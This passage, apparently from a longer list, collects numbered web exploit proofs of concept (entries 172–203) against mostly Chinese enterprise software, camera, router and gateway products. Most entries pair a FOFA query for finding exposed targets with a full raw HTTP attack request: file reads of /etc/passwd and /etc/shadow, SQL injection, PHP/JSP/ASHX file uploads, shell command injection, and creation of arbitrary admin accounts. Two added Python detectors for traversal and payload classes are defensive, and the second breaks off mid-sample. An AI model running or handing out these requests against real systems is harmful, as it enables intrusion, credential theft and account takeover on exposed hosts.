Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license-plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Note: browsers and most HTTP clients collapse the ../ segments before sending; send the request line verbatim (for example curl --path-as-is) when checking.

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinher OA (金和OA) C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinher OA (金和OA) C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
Request one of the following paths; the configuration file name follows the router model:
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system (校园网自助服务系统) flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

The uploaded file is then reachable with GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen (建文) engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

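The file-read entries in this list (160, 167, 168, 170, 172, 173, 174, 177, 178 and 179 above) all depend on the server resolving the ".." segments after its access check rather than before it, and several hide the traversal behind percent-encoding (%2F, %2e%2e), runs of slashes, or a query parameter rather than the path. The Python below is an added example written for defenders; it is not code from the original compilation or from any of the vendors named here. It canonicalizes a request target the way a WAF rule or a log review should before matching, and reports whether the request climbs out of the web root or reaches one of the files these PoCs read. The SENSITIVE_TARGETS list and the function names are my own choices, not anything from the page.

```python
import re
from urllib.parse import unquote, urlsplit

# Files the requests in this list try to reach. Constructed for this example;
# extend it with whatever your own applications must never serve.
SENSITIVE_TARGETS = (
    "/etc/passwd", "/etc/shadow", "web.xml", "web.config",
    "log4net.config", "jhfileconfig.ini", ".cfg",
)


def normalize_path(raw_path, max_rounds=3):
    """Return (canonical_path, root_escapes).

    Percent-decodes repeatedly so that %2e%2e and %252e%252e both become
    '..', treats backslashes as slashes, collapses runs of slashes (the
    Nexus request in entry 160 leans on '///////'), then resolves '.' and
    '..'. A '..' that would climb above the root is counted, not dropped,
    because that count is the evidence a defender wants to see.
    """
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = re.sub(r"[\\/]+", "/", path)
    segments, escapes = [], 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            else:
                escapes += 1
            continue
        segments.append(seg)
    return "/" + "/".join(segments), escapes


def analyze_request_target(target):
    """Inspect the path and every query value of a request target (or a raw
    body value such as the Check Point 'aCSHELL/../...' string in entry 173)
    and report the traversal evidence found."""
    parts = urlsplit(target)
    candidates = [parts.path]
    # Query values carry the traversal in entries 167 and 174
    # (p=UploadFile/../Web.Config, FilePath=../Resource/JHFileConfig.ini).
    for kv in parts.query.split("&"):
        if "=" in kv:
            candidates.append(kv.split("=", 1)[1])
    report = {"traversal": False, "escapes_root": False, "sensitive": []}
    for cand in candidates:
        norm, escapes = normalize_path(cand)
        if escapes:
            report["escapes_root"] = True
        decoded = unquote(unquote(cand)).replace("\\", "/")
        if ".." in decoded.split("/"):
            report["traversal"] = True
        low = norm.lower()
        for name in SENSITIVE_TARGETS:
            if name in low and name not in report["sensitive"]:
                report["sensitive"].append(name)
    return report


def is_traversal_attempt(target):
    """Single boolean for an alerting rule."""
    r = analyze_request_target(target)
    return r["traversal"] or r["escapes_root"] or bool(r["sensitive"])


if __name__ == "__main__":
    # Request targets taken from the entries above, plus one benign request.
    for t in (
        "/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
        "/Business/DownLoad.aspx?p=UploadFile/../Web.Config",
        "/imc/primepush/%2e%2e/flexFileUpload",
        "aCSHELL/../../../../../../../etc/shadow",
        "/index.php/jiliyu?keyword=1&page=1",
    ):
        print(is_traversal_attempt(t), analyze_request_target(t), t)
```

The decode loop matters more than it looks: a rule that decodes once and then looks for "../" misses %252e%252e (double encoding) and the Nexus form, where the slashes are what is encoded. Run the normalizer over the raw request line from your access log, not over the path your framework already cleaned up, because by then the evidence is gone.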
180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

The payload is Oracle error-based (ctxsys.drithsx.sn, FROM dual); note that the same endpoint also takes a new password for an arbitrary loginid.

184. Xunrao (迅饶) X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The request body is a raw SQL INSERT that the endpoint executes as sent; the PURVIEW column sets the privilege level of the new account.

185. Realor (瑞友) Tianyi application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

This is a stacked query: the unhex() argument decodes to <?php echo md5("1"); $file = __FILE__; unlink($file); and SELECT ... INTO OUTFILE writes it to WebRoot\plom.xgi. The file write only succeeds when the MySQL account has the FILE privilege and secure_file_priv does not restrict that directory.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

(RANDOMBLOB marks this as a SQLite backend; the payload is a heavy-query time-based probe rather than a sleep call.)

187. Mura CMS processAsyncObject SQL injection (time-based variant of entry 158)
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. Lanwon (蓝网科技) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system (CDGServer3) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    {
        get { return true; }
    }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Obtain the CSRF token:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Execute the command, substituting the token returned above for {{token}}:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Verify by fetching the file written above:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system assetsmanager/upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Request the login page to obtain the CSRF value, then obtain a session cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, body contains csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain the session cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

Uploaded file path: /storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute the __VIEWSTATE and __EVENTVALIDATION values into the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

Uploaded file path: /_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
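
The script below is an added example for the defensive use this list is published for; it is not code from the original post, from 网络安全新视界, or from any vendor named above. It parses a raw HTTP request in the form printed in these entries, flags the payload classes that recur through them (time-based SQL injection, UNION injection, local file read, script upload, shell command injection), and runs the same matcher over access-log request lines so the list can be turned into a retrospective check. The regular expressions are this example's own, and the sample requests and log lines are constructed from the shapes of entries 187, 188, 189, 194, 198 and 200, not captured traffic.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Indicator classes derived from the payload shapes that recur in this list.
# These patterns are the example's own, not a vendor signature set.
PATTERNS = {
    "time_based_sqli": re.compile(
        r"sleep\s*\(\s*\d+\s*\)|waitfor\s+delay\s+'?\d+:\d+:\d+|randomblob\s*\(\s*\d{6,}",
        re.I),
    "union_sqli": re.compile(r"union\s+(?:all\s+)?select", re.I),
    "file_read": re.compile(r"file:///|(?:\.\./){2,}|/etc/passwd", re.I),
    "script_upload": re.compile(
        r'filename="[^"]*\.(?:jspx?|php\d?|phtml|ashx|aspx?)"'
        r"|<\?php|<%\s*@?\s*webhandler|<%\s*out\.print", re.I),
    "command_injection": re.compile(
        r"os\.system\s*\(|[;|`]\s*(?:uname|ls|id|whoami|cat|echo)\b", re.I),
}

def decode(text):
    """URL-decode repeatedly so double-encoded payloads are still visible."""
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(text):
    """Return the sorted list of indicator classes found in the decoded text."""
    decoded = decode(text)
    return sorted(name for name, rx in PATTERNS.items() if rx.search(decoded))

def parse_raw_request(raw):
    """Split a raw HTTP request, as printed in this list, into its parts."""
    head, _, body = raw.strip("\n").replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path, "query": parts.query,
            "headers": headers, "body": body}

def inspect_request(raw):
    """Classify a raw request by its query string and body together."""
    req = parse_raw_request(raw)
    return req["path"], classify(req["query"] + "\n" + req["body"])

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def scan_access_log(lines):
    """Flag access-log entries whose request line carries an indicator.
    Only the request line is visible here, so POST-body payloads need
    WAF or application logs that record bodies."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        classes = classify(m.group("target"))
        if classes:
            hits.append((m.group("method"), urlsplit(m.group("target")).path, classes))
    return hits

# Constructed samples modelled on the POC shapes in this list (not captured traffic).
SAMPLE_POST = (
    "POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1\n"
    "Host: your-ip\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM "
    "(SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1\n"
)
SAMPLE_UPLOAD = (
    "POST /servlet/uploadAttachmentServlet HTTP/1.1\n"
    "Host: host\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk\n"
    "\n"
    "------WebKitFormBoundaryKNt0t4vBe8cX9rZk\n"
    'Content-Disposition: form-data; name="uploadFile"; '
    'filename="../../../../../jboss/web/fe.war/hello.jsp"\n'
    "Content-Type: text/plain\n"
    "\n"
    '<% out.println("hello");%>\n'
    "------WebKitFormBoundaryKNt0t4vBe8cX9rZk--\n"
)
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2024:10:00:00 +0800] "GET /xds/deleteStudy.php'
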